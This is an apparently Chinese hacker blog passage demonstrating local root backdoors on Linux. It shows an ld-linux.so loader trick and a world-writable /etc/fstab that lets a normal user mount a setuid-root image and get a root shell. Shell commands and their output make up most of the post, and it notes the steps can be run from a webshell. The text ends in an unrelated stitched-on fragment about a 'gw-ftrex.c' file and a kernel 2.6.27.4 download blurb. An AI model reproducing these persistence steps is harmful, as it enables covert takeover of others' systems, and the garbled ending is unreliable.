[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`
root
[xiaoyu@localdomain ~]$
恩，嘿嘿 root了吧，具体怎么生成root shell，你们自己去想吧，凡事都不要点得太透，对吧。呵呵，可以肯定的一点，/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell， bash检查euid 和uid，看是否相等...OK，不多说了。

方法二：

看过程:

[root@localdomain etc]# chmod a+w /etc/fstab
[root@localdomain etc]#

这就留好了。此方法比较XXOXX，估计没几个管理员知道。利用方法演示下

[xiaoyu@localdomain ~]$ ls -l /etc/fstab
-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab
[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab

然后从本机把一个文件到目标机器上去，这里我们命名为test

[xiaoyu@localdomain tmp]$ ls -l test
-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test
[xiaoyu@localdomain tmp]$ mount test
[xiaoyu@localdomain tmp]$ cd /mnt
[xiaoyu@localdomain mnt]$ ls -l
total 18
drwx------ 2 root root 12288 2008-04-20 05:44 lost+found
-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root
[xiaoyu@localdomain mnt]$ ./root
sh-3.2#
看到了吧，从普通用户提升到root了。呵呵。
test这个文件baidu貌似木有上传功能撒，木办法传

貌似可能有人说本地后门木啥鸟用，但是你要搞清楚：一个webshell里面就可以完成这一切....

/*
gw-ftrex.c:

Linux Kernel是Linux系统的核心部件,支持Intel、Alpha、PPC、 Sparc、IA-64 、ARM、MIPS、 Amiga、Atari和IBM s/390等,还支持32位大文件系统.而在Intel平台上,物理内存最大支持可以达到64GB.加强对IDE和 SCSI硬件系统的支持,并增强了对 USB设备和3D加速卡的支持.
 

下载:Linux Kernel 2.6.27.4
查看:Changelog